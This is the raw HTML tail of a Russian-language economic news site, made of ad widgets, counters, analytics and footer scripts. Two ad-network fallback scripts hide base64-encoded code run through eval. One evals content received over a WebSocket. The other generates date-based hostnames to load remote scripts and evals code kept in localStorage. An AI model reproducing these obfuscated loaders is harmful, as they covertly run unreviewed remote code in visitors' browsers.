href="https://enovosty.com/news_abroad/full/2008-kurez-polskie-fermery-sobirayut-urozhaj-pryamo-sredi-novyx-mnogoetazhek-video">Курьез: Польские фермеры собирают урожай прямо среди новых многоэтажек (ВИДЕО) (8512)</a></p></div></div></div><br><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script><ins class="adsbygoogle" style="display:inline-block;width:300px;height:250px" data-ad-client="ca-pub-1008673670491634" data-ad-slot="6220472701"></ins><script>(adsbygoogle = window.adsbygoogle || []).push({});</script><br><br> <div id="riainfo_e77f01cd5a912b7be06984da8aae869f" onclick="trackOutboundLink(this, 'AutoRia', 'auto.ria.com');"></div><br><div id="pravdomer_info" style="margin-top:5px"><a href="https://besplatka.ua/rabota" target="_blank"><img src="/wp-content/themes/eizvestia/img/BP_300x250_1.png" alt="работа на besplatka.ua"></a> </div><br><div id="redtram_news" onclick="trackOutboundLink(this, 'redtram_news', 'ru.redtram.com');"><div class="wiget simple"><div id="n4p_30546"><script class="r36857" type="text/javascript">(function() {var worker36857,tickerID = 36857,tag = document.currentScript || (function() {var scripts = document.getElementsByClassName('r36857'),len = scripts.length;return len ? scripts[len - 1] : null;})(),idn = (function() {var i, num, chars = "abcdefghiklmnopqrstuvwxyz",len = Math.floor((Math.random() * 2) + 4),idn = '';for (i = 0; i < len; i++) {num = Math.floor(Math.random() * chars.length);idn += chars.substring(num, num + 1);}return idn;})();
var container = document.createElement('div');container.id = idn;container.innerHTML = 'загрузка...';tag.parentNode.insertBefore(container, tag);var script = document.createElement('script');script.setAttribute('class', 's36857');script.setAttribute('data-idn', idn);script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36857.js';
script.type = 'text/javascript';script.charset = 'utf-8';script.onerror = function() {if (!('atob' in window && 'Worker' in window))
return;window.rtIsWebSocket = true;var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';function runExternalMessage(data) {worker36857.postMessage(data);}worker36857 = new Worker(URL.createObjectURL(
new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
));worker36857.onmessage = function(m) {var json = JSON.parse(m.data),content = JSON.parse(json)['content'];eval(content);};worker36857.postMessage(JSON.stringify({command: 'init',informer_id: tickerID,url: script.src
}));};tag.parentNode.insertBefore(script, tag);})();</script></div></div> </div><br><div><a href="https://www.youtube.com/channel/UCkFzUiPJ0z2YF4QIAhpkccg" target="_blank"><img alt="Экономические новости youtube" src="https://enovosty.com/wp-content/themes/eizvestia/img/ENTV2_Svedenie.gif"></a></div></br><div id="adpartner-jsunit-4125"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=4125&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div></br><div><a href="https://enovosty.com/politika/full/2007-sibir-i-dalnij-vostok-get-vid-moskvi" target="_blank"><img alt="Сибирь и Дальний Восток" src="/wp-content/uploads/2020/07/Get2.jpg"></a></div></br><link rel="stylesheet" type="text/css" href="https://s1.gismeteo.ua/static/css/informer2/gs_informerClient.min.css"><div id="gsInformerID-RpMlQd24Vh0i0g" class="gsInformer" style="width:300px;height:168px"> <div class="gsIContent"> <div id="cityLink"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/" title="Погода в Киеве" target="_blank"> <img src="https://s1.gismeteo.ua/static/images/gisloader.svg" width="24" height="24" alt="Погода в Киеве"> </a> </div> <div class="gsLinks"> <table> <tr> <td> <div class="leftCol"> <a href="https://www.gismeteo.ua" target="_blank" title="Погода"> <img alt="Погода" src="https://s1.gismeteo.ua/static/images/informer2/logo-mini2.png" align="middle" border="0" height="16" width="11"/> <img src="https://s1.gismeteo.ua/static/images/gismeteo.svg" border="0" align="middle" style="left: 5px; top:1px"> </a> </div> <div class="rightCol"> <a href="https://www.gismeteo.ua/weather-kyiv-4944/14-days/" target="_blank" title="Погода в Киеве на 2 недели"> <img src="https://s1.gismeteo.ua/static/images/informer2/forecast-2weeks.ru.svg" border="0" align="middle" style="top:auto" alt="Погода в Киеве на 2 недели"> </a> </div> </td> </tr> </table> </div> </div></div><script src="https://www.gismeteo.ua/ajax/getInformer/?hash=RpMlQd24Vh0i0g" type="text/javascript"></script></br><div id="MIXADV_7463" class="MIXADVERT_NET"></div> <script>var node7463 = document.getElementById("MIXADV_7463");if( node7463 )
{var script = document.createElement("script");script.charset = "utf-8";script.src = "https://m.mixadvert.com/show/?id=7463&r="+Math.random();
node7463.parentNode.appendChild(script);script.onerror = function(){window.eval(
atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDc0NjMgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNzQ2My5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTc0NjMucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTc0NjMuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjc0NjMiKSkgfSwgNTAwMCk7ICA7fTsg")
);}}</script><br><div id="help" style="margin-bottom: 15px;"><a href="https://ubb.org.ua/uk/category/3/ " target="_blank" rel="nofollow"><img style="width:300px;" src="/wp-content/themes/eizvestia/img/banner_subscribe_uk.png" alt="help"></a></div><br> <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div> <a style="margin-bottom:5px;display: inline-block;" href="https://www.bigmir.net/" target="_blank" onClick='img=new Image();img.src="//www.bigmir.net/?cl=101585";'><img src="//c.bigmir.net/?s101585&t8&l1" width="88" height="31" alt="bigmir)net TOP 100" title="bigmir)net TOP 100"></a> <br><script type="text/javascript">document.write('<a href="//www.liveinternet.ru/click" '+
'target="_blank"><img src="//counter.yadro.ru/hit?t52.6;r'+
escape(document.referrer)+((typeof(screen)=='undefined')?'':
';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+';u'+escape(document.URL)+
';h'+escape(document.title.substring(0,150))+';'+Math.random()+
'" alt="" title="LiveInternet: показане число переглядів і'+
' відвідувачів за 24 години" '+
'border="0" width="88" height="31"><\/a>')
</script><div class="links_bal" style="width:240px;"></div><div class="links_bal" style="width:240px;"></div>  <div class="wiget ukr_links" style="font-size:9px; color:#336699;"> </div></div><div class="cls"></div><script>
window.onload = function() {
// Delay to allow the async Google Ads to load
setTimeout(function() {
// Get the first AdSense ad unit on the page
var ad = document.querySelector("ins.adsbygoogle");
// If the ads are not loaded, track the event
if (ad && ad.innerHTML.replace(/\s/g, "").length == 0) {if (typeof ga !== 'undefined') {// Log an event in Universal Analytics
// but without affecting overall bounce rate
ga('send', 'event', 'Adblock', 'Yes', {'nonInteraction': 1});} else if (typeof _gaq !== 'undefined') {// Log a non-interactive event in old Google Analytics
_gaq.push(['_trackEvent', 'Adblock', 'Yes', undefined, undefined, true]);}}}, 2000); // Run ad block detection 2 seconds after page load
};
</script> </div> <!-- start NEW_content_v1 for enovosty.com <div id="adpartner-jsunit-3430"> <script type="text/javascript">var head = document.getElementsByTagName('head')[0];var script = document.createElement('script');script.type = 'text/javascript';script.src = "//a4p.adpartner.pro/jsunit?id=3430&ref=" + encodeURIComponent(document.referrer) + "&" + Math.random();
head.appendChild(script);</script></div> end NEW_content_v1 for enovosty.com --><div class="cls"></div><br> <div id="footer"> <div class="wiget text" style="padding-right:0; margin-right:0;" > <div id="bottom-menu" style="background: #F93; height:40px"> <a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/contacts">КОНТАКТЫ</a>|<a style="display: inline-block; width: 220px;vertical-align: top;" href="https://enovosty.com/politika-konfididencijnosti-ta-zaxistu-personalnix-danix">Политика конфиденциальности<br>и защиты персональных данных</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/redakcionnaya-politika">Редакционная политика</a>|<a style="display: inline-block; vertical-align: top;" href="https://enovosty.com/newsitemap">Карта сайта</a> </div> <div id="counters" > </div> <div id="textfooter"> <p>2018 &copy; "Экономические новости"</p> <p>Все права защищены. </p><p>Использование материалов разрешается при условии ссылки на <a href="https://enovosty.com" style="color:#336699; text-decoration:underline;">"Экономические новости"</a> (www.enovosty.com). Для интернет-изданий обязательной является прямая гиперссылка, не закрытая от индексации поисковыми системами (отсутствие в ссылке rel="nofollow" или "noindex" ), в первом или втором абзаце опубликованного материала (ссылка должна быть в тексте) на цитируемую статью или новость. Материалы, обозначенные символом <img style="margin-bottom:-3px" src="https://enovosty.com/wp-content/themes/eizvestia/img/reklama.png" width="16" height="14" alt="" />, публикуются на правах рекламы. <br />Производство онлайн-департамента газеты "Экономические новости" (www.enovosty.com).</p> </div>  <a href="/contacts" target="_blank" rel="nofollow" style="
float: right;
font-weight: bold;
color: #369;
padding: 10px;
">Размещение рекламы</a> </div> </div> <div class="links_bal"> </div></div><script src="https://enovosty.com/wp-content/themes/eizvestia/js/eishare.js?v=4"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/afk.js"></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/mailto.js"></script><div id="error-notification-id" class="enp-4815775"></div><div id="error-notification-settings" style="display: none;"><p>Спасибо большое за Вашу помощь. Мы исправим ошибку в ближайшее время!</p></div> <script>var isProcessing = false;function alter_ul_post_values(obj,post_id,ul_type){if (isProcessing)
return;isProcessing = true;jQuery(obj).find("span").html("..");jQuery.ajax({type: "POST",url: window.location.origin + "/wp-content/plugins/like-dislike-counter-for-posts-pages-and-comments/ajax_counter.php",data: "post_id="+post_id+"&up_type="+ul_type,success: function(msg){jQuery(obj).find("span").html(msg);isProcessing = false;}});}</script> <script type='text/javascript'>
var enp = {"ajaxurl":"\/wp-admin\/admin-ajax.php","barBackground":"#ff9933","barPosition":"bottom","barTextColor":"#ffffff","baseurl":"https:\/\/enovosty.com","confirmation":"1","cbTitle":"Are you sure?","cbError":"Error","cbOK":"OK","cbCancel":"Cancel"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/error-notification/error_notifi.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/ajax-comment-loading/js/google-acl2.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/clearfy/components/comments-plus/assets/js/url-span.js'></script><script type='text/javascript'>
var socialWarfare = {"addons":[],"post_id":"4815775","floatBeforeContent":""};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/social-warfare/assets/js/script.min.js'></script><script type='text/javascript' src='//imasdk.googleapis.com/js/sdkloader/ima3.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/video.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ads.min.js'></script><script type='text/javascript' src='https://enovosty.com/wp-content/themes/eizvestia/videojs/videojs.ima.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/wp-embed.min.js'></script><script type='text/javascript'>
var icl_vars = {"current_language":"ru","icl_home":"https:\/\/enovosty.com\/","ajax_url":"https:\/\/enovosty.com\/wp-admin\/admin-ajax.php","url_type":"1"};
</script><script type='text/javascript' src='https://enovosty.com/wp-content/plugins/sitepress-multilingual-cms/res/js/sitepress_js.js'></script><script type='text/javascript' src='https://enovosty.com/wp-includes/js/comment-reply.min.js'></script><script type="text/javascript"> var swp_nonce = "52dea484ec";var swpFloatBeforeContent = false;var swpClickTracking = false;</script><script>//new adriver("adriver_banner_A1", {sid:101080,sz:"A1", bt:52,pz:1,bn:0});
new adriver("adriver_banner_B4", {sid:101080,sz:"B4", bt:52,pz:2,bn:1});new adriver("adriver_banner_C1", {sid: 101080, sz: "C1", pz: 1, bn: 1, bt:52});//new adriver("adriver_banner_C2", {sid: 101080, sz: "C2", pz: 2, bn: 2, bt:52});
new adriver("adriver_banner_C3", {sid: 101080, sz: "C3", pz: 2, bn: 3, bt:52});new adriver("adriver_banner_branding", {sid: 101080, sz: "branding", bt:52});//new adriver("adriver_banner_1964215071", {sid:101080, bt:52, sz:'contentroll'});
</script><script>document.getElementById('logo').style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";//img.style.filter = "progid:DXImageTransform.Microsoft.AlphaImageLoader(...)";
</script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/iepngfix.min.js" ></script><script src="https://enovosty.com/wp-content/themes/eizvestia/js/png_fix.js" ></script><script>//var pollsL10n = document.getElementById('pollsL10n');
</script><!--<script type="text/javascript">admixerML.fn.push(function () {admixerML.defineSlot({z: '0e893395-4b69-455a-9d7a-6bc8d2aa074f',ph: 'admixer_0e8933954b69455a9d7a6bc8d2aa074f_zone_9056_sect_1082_site_1069',i: 'inv-nets'
});admixerML.singleRequest();});</script>--><div class="container"><div id="div-gpt-ad-1595961600637-0"><script>catfish('div-gpt-ad-1595961600637-0')
</script></div></div><!--<script type="text/javascript" charset="utf-8">(function(d,s){var o=d.createElement(s);o.async=true;o.type="text/javascript";o.charset="utf-8";if (location.protocol == "https:")
{ o.src="https://js-ru.redtram.com/n4p/0/30/ticker_30546.js"; }else
{ o.src="https://js.ru.redtram.com/n4p/0/30/ticker_30546.js"; }var x=d.getElementsByTagName(s)[0];x.parentNode.insertBefore(o,x);})(document,"script");</script>
--><script>jQuery(document).ready(function($){setTimeout(function() { ah2 = $("body .container").height(); $("#brandingimg").css('height', ah2 + 'px'); }, 2500);});</script><script type="text/javascript" src="https://affiliate.ria.com/js/ria_informer.js?riacode=e77f01cd5a912b7be06984da8aae869f" ></script><div id="bfooter" style="width:1004px;margin:0 auto;position: relative;padding: 0 10px;display: block;text-align:left;">&nbsp;</div> <iframe name="n01212138" style="display:none"></iframe><script>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</script><script>var player = videojs('my-player', {responsive: true
});

</script><script type="text/javascript">if (typeof window._tx === "undefined") {var s = document.createElement("script");s.type = "text/javascript";s.async = true;s.src = "//st.onlygip.tech/ssp.js";
(document.getElementsByTagName("head")[0] ||
document.getElementsByTagName("body")[0]).appendChild(s);}window._tx = window._tx || {};window._tx.cmds = window._tx.cmds || [];window._tx.cmds.push(function () {window._tx.init();});</script></body></html>